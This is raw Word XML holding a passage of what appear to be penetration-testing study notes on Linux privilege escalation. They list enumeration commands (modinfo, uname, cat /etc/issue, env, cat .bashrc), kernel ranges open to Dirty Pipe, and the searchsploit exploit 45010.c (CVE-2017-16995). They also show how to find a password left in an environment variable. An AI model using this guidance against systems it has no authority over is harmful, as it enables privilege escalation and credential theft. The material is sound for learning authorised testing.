      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B12">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once we've collected the list of loaded modules and identified those, we want more information about, such as libata in the above example, we can use modinfo to find out more about the specific module. We should note that this tool requires the full path to run.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B13">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B14">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3742354" cy="2185988"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="101" name="image99.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image99.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId915"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3742354" cy="2185988"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1171"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/sbin/modinfo libata</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B16">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B17">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once we've obtained a list of drivers and their versions, we are better positioned to find any relevant exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B18">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B19">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another command is</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> uname -a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and more about it can be found in this document</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B1A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B1B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B1C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_y5pspbov7idl" w:id="379"/>
      <w:bookmarkEnd w:id="379"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kernel Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B1D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B1E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dirty pipe:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="940"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dirty Pipe Vulnerable: 5.8 → 5.16.10 (inclusive), 5.15 → 5.15.24, 5.10 → 5.10.101</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1235"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5.9.0 exploited in XXXXXXXXX-B .149</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B21">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B22">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at the example in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX 18.4.3. Exploiting Kernel Vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B23">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B24">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/issue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B25">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uname -r</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B26">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">arch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B27">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B28">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B29">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ubuntu 16.04.3 LTS (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kernel 4.4.0-116-generic</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) was exploited in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX 18.4.3. Exploiting Kernel Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="294"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They found exploit for</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux Kernel &lt; 4.13.9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="294"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They used searchsploit 45010.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B2C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="294"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And it was cve-2017-16995</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B2D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B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2F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_r8htvwcya04g" w:id="380"/>
      <w:bookmarkEnd w:id="380"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">User Trail Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B30">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B31">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> XXXXXXXXX 18.2.1. Inspecting User Trails</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B32">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B33">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Environment variable:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B34">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4530569" cy="3405188"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="438" name="image431.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image431.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId916"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4530569" cy="3405188"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="350"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">env</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B36">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Interestingly, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SCRIPT_CREDENTIALS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> variable holds a value that resembles a password. To </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B37">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">confirm that we are dealing with a permanent variable, we need to inspect the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.bashrc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> configuration file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="384"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.bashrc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a shell startup file that Bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> runs every time you start a new interactive,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> non-login shell—for example, when you open a new terminal tab or window in a graphical environment, or when you SSH into a system without starting a login shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B39">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B3A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4538663" cy="2661061"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="95" name="image106.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image106.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId917"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4538663" cy="2661061"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="876"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat .bashrc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B3C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B3D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the above listing, we can confirm that the variable holding the password is exported when a user's shell is launched.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B3E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B3F">
      <w:pPr>
        <w:rPr/>
